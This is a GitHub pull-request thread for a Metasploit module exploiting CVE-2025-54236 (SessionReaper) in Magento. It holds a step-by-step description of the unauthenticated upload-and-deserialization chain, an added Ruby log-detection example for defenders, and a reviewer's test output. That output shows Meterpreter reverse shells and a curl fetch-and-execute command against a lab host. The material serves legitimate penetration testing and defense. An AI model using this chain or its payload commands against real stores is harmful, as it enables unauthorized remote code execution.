
@Chocapikk Chocapikk commented Nov 24, 2025

Hello Metasploit Team,

This PR adds a new exploit module for CVE-2025-54236 (SessionReaper), a critical vulnerability in Magento/Adobe Commerce that allows unauthenticated remote code execution.

The vulnerability stems from improper handling of nested deserialization in the payment method context, combined with an unauthenticated file upload endpoint. The exploit chain consists of:

  1. Uploading a malicious PHP session file containing a Guzzle/FW1 deserialization payload via the unauthenticated /customer/address_file/upload endpoint
  2. Triggering deserialization by sending a crafted JSON payload to the REST API endpoint /rest/default/V1/guest-carts/{cart_id}/order that modifies the session savePath to point to the uploaded file
  3. Executing the uploaded PHP code to gain remote code execution

This module supports multiple targets:

  • PHP In-Memory (php/meterpreter/reverse_tcp)
  • Unix/Linux Command Shell (cmd/linux/http/x64/meterpreter/reverse_tcp)
  • Windows Command Shell (cmd/windows/http/x64/meterpreter/reverse_tcp)

The module includes:

  • Automatic vulnerability detection via the check() method
  • Support for both PHP and command payloads
  • Complete documentation with real-world examples
  • Automatic file cleanup using FileDropper mixin

The module has been tested against Magento 2.4.4 and passes all code quality checks (msftidy, rubocop, msftidy_docs).

Thanks
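For defenders reading this thread, an added example (not code from the module or the PR author) that correlates the chain described above in web-server access logs: an address-file upload followed shortly by a guest-cart order request from the same client, plus a 500 on the order endpoint, which is the symptom the module's check() reports. The log format is a constructed, simplified one, and the endpoint paths are taken as they appear in the PR description.

```ruby
# Added example, not part of the Metasploit module: correlate the SessionReaper
# request sequence in access logs. The log format is a constructed, simplified
# one: "<client-ip> <ISO-8601 time> <method> <path> <status>".
require 'time'

UPLOAD_PATH = '/customer/address_file/upload'
ORDER_RE    = %r{\A/rest/default/V1/guest-carts/[^/]+/order\z}
WINDOW      = 600 # seconds between an upload and the REST trigger from one client

LogEntry = Struct.new(:ip, :time, :method, :path, :status)

def parse_line(line)
  ip, ts, method, path, status = line.split(' ', 5)
  LogEntry.new(ip, Time.iso8601(ts), method, path, Integer(status))
rescue ArgumentError, TypeError
  nil # malformed line: skip it
end

# Returns [[ip, finding, time], ...] in the order the events appear in the log.
#   :upload_then_order_trigger  address-file upload followed within WINDOW by a
#                               guest-cart order request from the same client
#   :order_endpoint_500         guest-cart order answered with HTTP 500, the
#                               response the module's check() keys on
def detect_sessionreaper(lines)
  uploads  = Hash.new { |h, k| h[k] = [] }
  findings = []
  lines.map { |l| parse_line(l) }.compact.each do |e|
    if e.method == 'POST' && e.path == UPLOAD_PATH
      uploads[e.ip] << e.time
    elsif e.method == 'POST' && e.path.match?(ORDER_RE)
      if uploads[e.ip].any? { |t| (e.time - t).between?(0, WINDOW) }
        findings << [e.ip, :upload_then_order_trigger, e.time]
      end
      findings << [e.ip, :order_endpoint_500, e.time] if e.status == 500
    end
  end
  findings
end

# Constructed sample: one client runs the chain, one is a normal guest checkout,
# one only trips the 500, and one line is garbage.
SAMPLE_LOG = [
  '203.0.113.7 2025-12-08T10:51:20Z POST /customer/address_file/upload 200',
  '203.0.113.7 2025-12-08T10:51:23Z POST /rest/default/V1/guest-carts/abc123/order 404',
  '198.51.100.2 2025-12-08T10:55:00Z POST /rest/default/V1/guest-carts/xyz789/order 200',
  '203.0.113.9 2025-12-08T11:02:00Z POST /rest/default/V1/guest-carts/q1/order 500',
  'garbage line'
].freeze
```

Note that the module's FileDropper cleanup removes the dropped files after a successful run, so the access-log sequence is a more durable trace than a filesystem search for stray sess_ files under media/customer_address.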

@Chocapikk Chocapikk closed this Nov 24, 2025
@Chocapikk Chocapikk deleted the magento branch November 24, 2025 20:06
@Chocapikk Chocapikk restored the magento branch November 24, 2025 20:07
@Chocapikk Chocapikk reopened this Nov 24, 2025
@dledda-r7

@Chocapikk Welcome back 🔥

@jheysel-r7 jheysel-r7 self-assigned this Dec 5, 2025
@jheysel-r7 jheysel-r7 added the module, docs, rn-fix (release notes fix) and rn-modules (release notes for new or majorly enhanced modules) labels Dec 5, 2025
@jheysel-r7 jheysel-r7 removed the rn-fix (release notes fix) label Dec 5, 2025
@jheysel-r7 jheysel-r7 left a comment


Great work @Chocapikk. Testing was as expected

Testing

PHP Target

msf exploit(multi/http/magento_sessionreaper) > set TARGET 0
TARGET => 0
msf exploit(multi/http/magento_sessionreaper) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/http/magento_sessionreaper) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Target returned 500 error with SessionHandler
[*] Generating Guzzle/FW1 deserialization payload...
[*] Uploading session file with Guzzle payload...
[*] Uploading malicious session file: sess_c3fb3992f5cc0a1c7f345d1a1443fb68
[*] Triggering deserialization with savePath: media/customer_address/s/e
[+] Deserialization triggered (HTTP 404)
[*] Executing payload at: /pub/orZQ3.php
[*] Sending stage (41224 bytes) to 172.16.199.1
[+] Deleted orZQ3.php
[+] Deleted media/customer_address/s/e/sess_c3fb3992f5cc0a1c7f345d1a1443fb68
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.1:58027) at 2025-12-08 10:51:27 -0800

Linux Target

msf exploit(multi/http/magento_sessionreaper) > set TARGET 1
TARGET => 1
msf exploit(multi/http/magento_sessionreaper) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/http/magento_sessionreaper) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf exploit(multi/http/magento_sessionreaper) > set verbose true
verbose => true
msf exploit(multi/http/magento_sessionreaper) > run
[*] Command to run on remote host: curl -so ./xBCMazylYe http://172.16.199.1:8080/Hn-8qIL46e0vZdQpIHPToA;chmod +x ./xBCMazylYe;./xBCMazylYe&
[*] Fetch handler listening on 172.16.199.1:8080
[*] HTTP server started
[*] Adding resource /Hn-8qIL46e0vZdQpIHPToA
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Target returned 500 error with SessionHandler
[*] Generating Guzzle/FW1 deserialization payload...
[*] Uploading session file with Guzzle payload...
[*] Uploading malicious session file: sess_7799d6d53785e66b64e7fd933e3a02cf
[*] Triggering deserialization with savePath: media/customer_address/s/e
[+] Deserialization triggered (HTTP 404)
[*] Executing payload at: /pub/F7Gux.php
[*] Client 172.16.199.1 requested /Hn-8qIL46e0vZdQpIHPToA
[*] Sending payload to 172.16.199.1 (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 172.16.199.1
[+] Deleted F7Gux.php
[+] Deleted media/customer_address/s/e/sess_7799d6d53785e66b64e7fd933e3a02cf
[+] Deleted xBCMazylYe
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.1:54588) at 2025-12-08 10:32:31 -0800

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 172.19.0.2
OS           : Debian 11.5 (Linux 6.12.54-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Check Command in Isolation:

msf exploit(multi/http/magento_sessionreaper) > check
[*] 127.0.0.1:8082 - The target appears to be vulnerable. Target returned 500 error with SessionHandler

Review comment on the module documentation (quoted lines from the docs):

> allows an unauthenticated user to gain arbitrary code execution through nested deserialization and unauthenticated file upload.
>
> This vulnerability (CVE-2025-54236, also known as SessionReaper) affects Magento 2.x instances using file-based session

Is file-based session storage enabled by default? I think it would be worth explicitly mentioning that detail here.
